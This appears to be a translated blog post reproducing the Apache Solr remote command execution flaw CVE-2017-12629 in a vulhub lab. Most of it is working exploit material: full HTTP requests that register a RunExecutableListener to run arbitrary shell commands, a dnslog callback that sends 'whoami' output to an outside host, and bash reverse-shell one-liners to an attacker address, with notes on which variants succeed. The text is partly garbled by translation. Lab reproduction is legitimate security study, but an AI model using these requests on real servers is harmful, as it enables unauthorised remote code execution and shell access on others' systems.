[vulhub] duplicate of Apache Solr remote command execution vulnerability (CVE-2017-12629)

features

Visit port 8983 to view the administration page of Apache solr without logging in. (port may be changed)
The website title is Solr Admin, and the icon is a bit like a red flower

Impact version

Apache Solr 5.5.0 to 7.0.1

Exploit vulnerability

Before version 7.1.0, there were two vulnerabilities: XML entity extension vulnerability (XXE) and remote command execution vulnerability (RCE), which can be connected into a utilization chain, and the numbers are CVE-2017-12629.

https://paper.seebug.org/425/

Here, I read the official document of vulhub. First, create a listener, and then update. Trigger the listener just added to trigger the command we want to execute

Note:

1, After the landlord's test, a listener can only be used once, so change it once!

2, update triggers all listeners!, Therefore, the existing listener will also be triggered! But the landlord tests here. The listener cannot be created too much, or it will collapse. I don't know if the landlord's memory allocation is too small

First, create a listener, where the value of exe is set to the command we want to execute, and the value of args is the command parameter:

POST /solr/demo/config HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 158

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}


Let's try using the name value again. What happens?
You can see that if you reuse the name value, you will directly report an error, and you cannot successfully create a listener!

Then perform the update operation to trigger the listener just added:
This package only executes the non triggered listener!

POST /solr/demo/update HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]


In the figure of listener above, the landlord created a b1 file, so go and have a look
Successfully executed!

Note: after the update operation, the command will be delayed a little. Please wait patiently for more than 20 seconds

2, Now that it can be successfully implemented, let's use a simpler method to verify it!

dnslog validation!

The method is handled as above!
Change the name value and change the command

curl `whoami`.jxodqu.dnslog.cn
POST /solr/demo/config HTTP/1.1
Host: 192.168.100.34:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 161

{"add-listener":{"event":"postCommit","name":"b2","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl `whoami`.jxodqu.dnslog.cn"]}}

Then go to update to trigger the listener
Then successfully see the echo in dnslog!

Rebound shell

Listen first

Then create a listener. Change the value of name (changed to b3) and the command we want to execute

bash -i >& /dev/tcp/192.168.100.34/9090 0>&1

be careful:

1.0,
Both sides bash
 use bash -i >& /dev/tcp/192.168.100.34/9090 0>&1
 Can rebound
1.1,
Both sides sh
 use sh -i >& /dev/udp/192.168.100.34/1111 0>&1
 Unable to rebound
1.2,
Both sides/bin/bash
 use/bin/bash -i > /dev/tcp/192.168.100.34/1111 0<& 2>&1
 Unable to rebound
We know from above, 1.0 If you can rebound successfully, use this 1.0
2,
linux Generally, it is used by default bash,But our bag is sh,So if you want to rebound, you must put the sh Change to bash

.


Successful rebound

summary

1. Only the runtime function of java needs to be encoded. The solr.RunExecutableListener function is used here

2. (that is to say, the command language of both sides should be the same!)
Both sides are bash
Use bash - I > & / dev / TCP / 192.168.100.34/1111 0 > & 1
Can rebound

Tags: Apache solr vulhub

Posted on Fri, 17 Sep 2021 18:29:46 -0400 by jcampbell1